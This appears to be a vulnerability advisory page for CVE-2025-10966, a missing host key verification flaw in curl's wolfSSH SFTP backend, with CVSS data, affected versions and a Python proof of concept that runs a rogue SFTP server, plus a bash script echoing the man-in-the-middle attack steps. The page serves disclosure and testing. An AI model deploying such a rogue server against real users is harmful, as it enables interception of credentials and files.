curl's code for managing SSH connections when SFTP was done using the wolfSSH
powered backend was flawed and missed host verification mechanisms.
This prevents curl from detecting MITM attackers and more.
CVSS Details
CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
Configurations (Affected Products)
cpe:2.3:a:haxx:curl:*:*:*:*:*:*:*:* - VULNERABLE
curl (wolfSSH backend) < 8.11.0
curl (wolfSSH backend) < 8.10.8
Specific affected versions depend on curl release containing wolfSSH backend with the verification bug
PoC / Exploit Code
⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-10966 PoC - curl wolfSSH SFTP MITM Attack Simulation
# This PoC demonstrates the host key verification bypass in curl's wolfSSH backend
import socket
import threading
import paramiko
import time
from paramiko import RSAKey, Transport
class FakeSFTPServer:
"""Simulate a malicious SFTP server that exploits missing host verification"""
def __init__(self, host='0.0.0.0', port=22, target_port=22):
self.host = host
self.port = port
self.target_port = target_port
self.host_key = RSAKey.generate(2048)
def start(self):
"""Start the fake SFTP server"""
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server_socket.bind((self.host, self.port))
server_socket.listen(5)
print(f"[*] Fake SFTP server listening on port {self.port}")
while True:
client_socket, addr = server_socket.accept()
print(f"[+] Connection received from {addr}")
threading.Thread(target=self.handle_client, args=(client_socket,)).start()
def handle_client(self, client_socket):
"""Handle client connection - exploit missing host verification"""
try:
transport = Transport(client_socket)
transport.add_server_key(self.host_key)
transport.start_server()
# Wait for client authentication
channel = transport.accept(timeout=30)
if channel:
print("[+] Client connected - host verification was BYPASSED")
print("[!] Attacker can now intercept/modify all SFTP traffic")
# Log intercepted activity
channel.send(b"Welcome to fake SFTP server\r\n")
time.sleep(1)
channel.close()
except Exception as e:
print(f"[-] Error: {e}")
finally:
client_socket.close()
def generate_mitm_script():
"""Generate script to demonstrate MITM attack scenario"""
return '''#!/bin/bash
# CVE-2025-10966 MITM Attack Script
# For educational and authorized testing purposes only
echo "CVE-2025-10966: curl wolfSSH SFTP Host Verification Bypass"
echo "========================================================="
echo ""
echo "Attack Prerequisites:"
echo "1. Attacker must be positioned for MITM (same network/ARP spoofing)"
echo "2. Target must be using curl with wolfSSH backend for SFTP"
echo "3. No host key verification is performed by vulnerable curl"
echo ""
echo "Attack Flow:"
echo "1. Attacker intercepts SFTP connection request"
echo "2. Attacker presents their own SSH host key"
echo "3. Vulnerable curl accepts key WITHOUT verification"
echo "4. Attacker establishes 'secure' channel with victim"
echo "5. All data (credentials, files) can be intercepted"
echo ""
echo "Detection Method:"
echo "# Check if curl was built with wolfSSH support"
echo "curl --version | grep wolfssh"
echo ""
echo "# Verify host key changes (if verification was working)"
echo "ssh-keyscan -t rsa sftp-server.example.com"
'''
if __name__ == "__main__":
print("CVE-2025-10966 PoC - curl wolfSSH SFTP Host Verification Bypass")
print("=" * 70)
print("\n[!] This PoC is for educational and authorized testing purposes only")
print("\nStarting fake SFTP server...")
server = FakeSFTPServer(host='0.0.0.0', port=2222)
server.start()